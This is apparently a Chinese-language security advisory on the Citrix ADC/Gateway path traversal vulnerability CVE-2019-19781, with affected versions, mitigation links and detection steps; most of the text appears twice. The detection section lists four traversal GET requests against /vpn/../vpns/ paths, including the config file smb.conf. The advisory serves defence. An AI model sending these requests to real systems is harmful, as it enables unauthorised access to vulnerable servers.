【高危】- Citrix路径遍历风险提示(CVE-2019-19781)
■ 漏洞描述
目前CVE-2019-19781 Citrx代码执行漏洞、路径遍历利用方式的PoC被公开。该漏洞利用复杂性低,且无权限要求。
此前,在Citrix官方公告中,该漏洞被描述代码执行漏洞,利用方式暂未公开。此次公开的PoC为目录遍历利用方式。
■ 影响范围
• Citrix ADC和Citrix Gateway13.0版本
• Citrix ADC和NetScaler Gateway12.1版本
• Citrix ADC和NetScaler Gateway12.0版本
• Citrix ADC和NetScaler Gateway11.1版本
• Citrix NetScaler ADC和NetScaler Gateway10.5版本
■ 漏洞检测
检测方法:
1、查看软件版本。
2、利用方式:
(1)GET /vpn/../vpns/services.html
(2)GET /vpn/../vpns/cfg/smb.conf
(3)GET /vpn/../vpns/portal/scripts/newbm.pl
(4)GET /vpn/../vpns/portal/scripts/rmbm.pl
■ 漏洞修复
请参考官方缓解措施:
https://support.citrix.com/article/CTX267679
■ 临时修复
1、添加waf,限制url访问。
■ 漏洞详情
https://cert.360.cn/warning/detail?id=c642f88345f3ae47efdcd32d8770a43e
https://nvd.nist.gov/vuln/detail/CVE-2019-19781
目前CVE-2019-19781 Citrx代码执行漏洞、路径遍历利用方式的PoC被公开。该漏洞利用复杂性低,且无权限要求。
此前,在Citrix官方公告中,该漏洞被描述代码执行漏洞,利用方式暂未公开。此次公开的PoC为目录遍历利用方式。
■ 影响范围
• Citrix ADC和Citrix Gateway13.0版本
• Citrix ADC和NetScaler Gateway12.1版本
• Citrix ADC和NetScaler Gateway12.0版本
• Citrix ADC和NetScaler Gateway11.1版本
• Citrix NetScaler ADC和NetScaler Gateway10.5版本
■ 漏洞检测
检测方法:
1、查看软件版本。
2、利用方式:
(1)GET /vpn/../vpns/services.html
(2)GET /vpn/../vpns/cfg/smb.conf
(3)GET /vpn/../vpns/portal/scripts/newbm.pl
(4)GET /vpn/../vpns/portal/scripts/rmbm.pl
■ 漏洞修复
请参考官方缓解措施:
https://support.citrix.com/article/CTX267679
■ 临时修复
1、添加waf,限制url访问。
■ 漏洞详情
https://cert.360.cn/warning/detail?id=c642f88345f3ae47efdcd32d8770a43e
https://nvd.nist.gov/vuln/detail/CVE-2019-19781